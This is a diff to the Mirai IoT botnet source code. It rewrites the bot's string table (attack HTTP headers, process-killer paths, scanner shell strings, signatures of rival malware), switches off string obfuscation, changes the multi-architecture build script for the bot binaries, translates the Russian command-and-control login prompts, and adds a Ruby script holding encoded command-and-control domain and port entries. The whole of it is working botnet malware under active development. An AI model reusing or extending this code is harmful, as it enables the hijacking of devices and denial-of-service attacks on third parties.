add_entry(TABLE_ATK_ACCEPT, "\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x00", 83);
|
||||
add_entry(TABLE_ATK_ACCEPT_LNG, "\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38\x00", 32);
|
||||
add_entry(TABLE_ATK_CONTENT_TYPE, "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x00", 48);
|
||||
add_entry(TABLE_ATK_SET_COOKIE, "\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x28\x27\x00", 12);
|
||||
add_entry(TABLE_ATK_REFRESH_HDR, "\x72\x65\x66\x72\x65\x73\x68\x3a\x00", 9);
|
||||
add_entry(TABLE_ATK_LOCATION_HDR, "\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x00", 10);
|
||||
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x73\x65\x74\x2d\x63\x6f\x6f\x6b\x69\x65\x3a\x00", 12);
|
||||
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x00", 16);
|
||||
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x74\x72\x61\x6e\x73\x66\x65\x72\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x00", 19);
|
||||
add_entry(TABLE_ATK_CHUNKED, "\x63\x68\x75\x6e\x6b\x65\x64\x00", 8);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 11);
|
||||
add_entry(TABLE_ATK_CONNECTION_HDR, "\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x00", 12);
|
||||
add_entry(TABLE_ATK_DOSARREST, "\x73\x65\x72\x76\x65\x72\x3a\x20\x64\x6f\x73\x61\x72\x72\x65\x73\x74\x00", 18);
|
||||
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x73\x65\x72\x76\x65\x72\x3a\x20\x63\x6c\x6f\x75\x64\x66\x6c\x61\x72\x65\x2d\x6e\x67\x69\x6e\x78\x00", 25);
|
||||
add_entry(TABLE_HTTP_ONE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
|
||||
add_entry(TABLE_HTTP_TWO, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
|
||||
add_entry(TABLE_HTTP_THREE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
|
||||
add_entry(TABLE_HTTP_FOUR, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
|
||||
add_entry(TABLE_HTTP_FIVE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x30\x5f\x31\x31\x5f\x36\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x36\x30\x31\x2e\x37\x2e\x37\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x56\x65\x72\x73\x69\x6f\x6e\x2f\x39\x2e\x31\x2e\x32\x20\x53\x61\x66\x61\x72\x69\x2f\x36\x30\x31\x2e\x37\x2e\x37\x00", 117);
|
||||
|
||||
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);
|
||||
|
||||
// safe string https://youtu.be/dQw4w9WgXcQ
|
||||
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);
|
||||
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);
|
||||
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);
|
||||
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);
|
||||
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);
|
||||
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);
|
||||
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);
|
||||
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);
|
||||
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);
|
||||
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);
|
||||
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);
|
||||
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);
|
||||
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);
|
||||
|
||||
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);
|
||||
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);
|
||||
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);
|
||||
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);
|
||||
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);
|
||||
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);
|
||||
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);
|
||||
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);
|
||||
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);
|
||||
|
||||
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);
|
||||
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);
|
||||
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);
|
||||
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);
|
||||
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);
|
||||
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);
|
||||
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);
|
||||
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);
|
||||
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);
|
||||
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);
|
||||
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);
|
||||
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);
|
||||
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);
|
||||
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);
|
||||
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);
|
||||
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);
|
||||
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);
|
||||
|
||||
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
|
||||
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
|
||||
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
|
||||
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
|
||||
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
|
||||
}
|
||||
|
||||
void table_unlock_val(uint8_t id)
|
||||
|
@ -86,8 +86,8 @@ void table_unlock_val(uint8_t id)
|
|||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
toggle_obf(id);
|
||||
//NO OBFUSCATION NEEDED. FIXED.
|
||||
//toggle_obf(id);
|
||||
}
|
||||
|
||||
void table_lock_val(uint8_t id)
|
||||
|
@ -101,8 +101,8 @@ void table_lock_val(uint8_t id)
|
|||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
toggle_obf(id);
|
||||
//NO OBFUSCATION
|
||||
//toggle_obf(id);
|
||||
}
|
||||
|
||||
char *table_retrieve_val(int id, int *len)
|
||||
|
|
|
@ -1,4 +1,6 @@
|
|||
#!/bin/bash
|
||||
go get github.com/go-sql-driver/mysql
|
||||
go get github.com/mattn/go-shellwords
|
||||
|
||||
FLAGS=""
|
||||
|
||||
|
@ -29,7 +31,6 @@ elif [ "$1" == "release" ]; then
|
|||
compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH"
|
||||
compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
|
@ -40,7 +41,6 @@ elif [ "$1" == "release" ]; then
|
|||
compile_bot mipsel miraint.mpsl "-static"
|
||||
compile_bot armv4l miraint.arm "-static"
|
||||
compile_bot armv5l miraint.arm5n " "
|
||||
compile_bot armv6l miraint.arm7 "-static"
|
||||
compile_bot powerpc miraint.ppc "-static"
|
||||
compile_bot sparc miraint.spc "-static"
|
||||
compile_bot m68k miraint.m68k "-static"
|
||||
|
@ -51,7 +51,6 @@ elif [ "$1" == "debug" ]; then
|
|||
gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.dbg
|
||||
mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips
|
||||
armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm
|
||||
armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7
|
||||
sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4
|
||||
gcc -std=c99 tools/enc.c -g -o debug/enc
|
||||
gcc -std=c99 tools/nogdb.c -g -o debug/nogdb
|
||||
|
|
|
@ -35,7 +35,8 @@ func (this *Admin) Handle() {
|
|||
|
||||
// Get username
|
||||
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
|
||||
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m"))
|
||||
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[34;1musername\033[33;3m: \033[0m"))
|
||||
username, err := this.ReadLine(false)
|
||||
if err != nil {
|
||||
return
|
||||
|
@ -43,7 +44,8 @@ func (this *Admin) Handle() {
|
|||
|
||||
// Get password
|
||||
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
|
||||
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))
|
||||
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[34;1mpassword\033[33;3m: \033[0m"))
|
||||
password, err := this.ReadLine(true)
|
||||
if err != nil {
|
||||
return
|
||||
|
@ -53,7 +55,8 @@ func (this *Admin) Handle() {
|
|||
this.conn.Write([]byte("\r\n"))
|
||||
spinBuf := []byte{'-', '\\', '|', '/'}
|
||||
for i := 0; i < 15; i++ {
|
||||
this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
//this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
this.conn.Write(append([]byte("\r\033[37;1mchecking account ... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
time.Sleep(time.Duration(300) * time.Millisecond)
|
||||
}
|
||||
|
||||
|
@ -61,7 +64,9 @@ func (this *Admin) Handle() {
|
|||
var userInfo AccountInfo
|
||||
if loggedIn, userInfo = database.TryLogin(username, password); !loggedIn {
|
||||
this.conn.Write([]byte("\r\033[32;1mпроизошла неизвестная ошибка\r\n"))
|
||||
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m"))
|
||||
this.conn.Write([]byte("\r\033[32;1mAn unknown error occurred\r\n"))
|
||||
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[31mPress any key to exit. (any key)\033[0m"))
|
||||
buf := make([]byte, 1)
|
||||
this.conn.Read(buf)
|
||||
return
|
||||
|
|
|
@ -7,7 +7,7 @@ import (
|
|||
"time"
|
||||
)
|
||||
|
||||
const DatabaseAddr string = "127.0.0.1"
|
||||
const DatabaseAddr string = "127.0.0.1:3306"
|
||||
const DatabaseUser string = "root"
|
||||
const DatabasePass string = "password"
|
||||
const DatabaseTable string = "mirai"
|
||||
|
|
58
tools/decode_table.rb
Normal file
58
tools/decode_table.rb
Normal file
|
@ -0,0 +1,58 @@
|
|||
hashtable = {
|
||||
TABLE_CNC_DOMAIN: "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
|
||||
TABLE_CNC_PORT: "\x22\x35",
|
||||
TABLE_SCAN_CB_DOMAIN: "\x50\x47\x52\x4d\x50\x56\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
|
||||
TABLE_SCAN_CB_PORT: "\x99\xc7",
|
||||
TABLE_EXEC_SUCCESS: "\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
|
||||
TABLE_KILLER_SAFE: "\x4a\x56\x56\x52\x51\x18\x0d\x0d\x5b\x4d\x57\x56\x57\x0c\x40\x47\x0d\x46\x73\x55\x16\x55\x1b\x75\x45\x7a\x41\x73\x22",
|
||||
TABLE_KILLER_PROC: "\x0d\x52\x50\x4d\x41\x0d\x22",
|
||||
TABLE_KILLER_EXE: "\x0d\x47\x5a\x47\x22",
|
||||
TABLE_KILLER_DELETED: "\x02\x0a\x46\x47\x4e\x47\x56\x47\x46\x0b\x22",
|
||||
TABLE_KILLER_FD: "\x0d\x44\x46\x22",
|
||||
TABLE_KILLER_ANIME: "\x0c\x43\x4c\x4b\x4f\x47\x22",
|
||||
TABLE_KILLER_STATUS: "\x0d\x51\x56\x43\x56\x57\x51\x22",
|
||||
TABLE_MEM_QBOT: "\x70\x67\x72\x6d\x70\x76\x02\x07\x51\x18\x07\x51\x22",
|
||||
TABLE_MEM_QBOT2: "\x6a\x76\x76\x72\x64\x6e\x6d\x6d\x66\x22",
|
||||
TABLE_MEM_QBOT3: "\x6e\x6d\x6e\x6c\x6d\x65\x76\x64\x6d\x22",
|
||||
TABLE_MEM_UPX: "\x7e\x5a\x17\x1a\x7e\x5a\x16\x66\x7e\x5a\x16\x67\x7e\x5a\x16\x67\x7e\x5a\x16\x11\x7e\x5a\x17\x12\x7e\x5a\x16\x14\x7e\x5a\x10\x10\x22",
|
||||
TABLE_MEM_ZOLLARD: "\x58\x4d\x4e\x4e\x43\x50\x46\x22",
|
||||
TABLE_MEM_REMAITEN: "\x65\x67\x76\x6e\x6d\x61\x63\x6e\x6b\x72\x22",
|
||||
TABLE_SCAN_SHELL: "\x51\x4a\x47\x4e\x4e\x22",
|
||||
TABLE_SCAN_ENABLE: "\x47\x4c\x43\x40\x4e\x47\x22",
|
||||
TABLE_SCAN_SYSTEM: "\x51\x5b\x51\x56\x47\x4f\x22",
|
||||
TABLE_SCAN_SH: "\x51\x4a\x22",
|
||||
TABLE_SCAN_QUERY: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x6f\x6b\x70\x63\x6b\x22",
|
||||
TABLE_SCAN_RESP: "\x6f\x6b\x70\x63\x6b\x18\x02\x43\x52\x52\x4e\x47\x56\x02\x4c\x4d\x56\x02\x44\x4d\x57\x4c\x46\x22",
|
||||
TABLE_SCAN_NCORRECT: "\x4c\x41\x4d\x50\x50\x47\x41\x56\x22",
|
||||
TABLE_SCAN_PS: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x52\x51\x22",
|
||||
TABLE_SCAN_KILL_9: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x49\x4b\x4e\x4e\x02\x0f\x1b\x02\x22",
|
||||
TABLE_ATK_VSE: "\x76\x71\x4d\x57\x50\x41\x47\x02\x67\x4c\x45\x4b\x4c\x47\x02\x73\x57\x47\x50\x5b\x22",
|
||||
TABLE_ATK_RESOLVER: "\x0d\x47\x56\x41\x0d\x50\x47\x51\x4d\x4e\x54\x0c\x41\x4d\x4c\x44\x22",
|
||||
TABLE_ATK_NSERV: "\x4c\x43\x4f\x47\x51\x47\x50\x54\x47\x50\x02\x22",
|
||||
TABLE_ATK_KEEP_ALIVE: "\x61\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x02\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
|
||||
TABLE_ATK_ACCEPT: "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5a\x56\x0d\x4a\x56\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4a\x56\x4f\x4e\x09\x5a\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4f\x4e\x19\x53\x1f\x12\x0c\x1b\x0e\x4b\x4f\x43\x45\x47\x0d\x55\x47\x40\x52\x0e\x08\x0d\x08\x19\x53\x1f\x12\x0c\x1a\x22",
|
||||
TABLE_ATK_ACCEPT_LNG: "\x63\x41\x41\x47\x52\x56\x0f\x6e\x43\x4c\x45\x57\x43\x45\x47\x18\x02\x47\x4c\x0f\x77\x71\x0e\x47\x4c\x19\x53\x1f\x12\x0c\x1a\x22",
|
||||
TABLE_ATK_CONTENT_TYPE: "\x61\x4d\x4c\x56\x47\x4c\x56\x0f\x76\x5b\x52\x47\x18\x02\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x0f\x55\x55\x55\x0f\x44\x4d\x50\x4f\x0f\x57\x50\x4e\x47\x4c\x41\x4d\x46\x47\x46\x22",
|
||||
TABLE_ATK_SET_COOKIE: "\x51\x47\x56\x61\x4d\x4d\x49\x4b\x47\x0a\x05\x22",
|
||||
TABLE_ATK_REFRESH_HDR: "\x50\x47\x44\x50\x47\x51\x4a\x18\x22",
|
||||
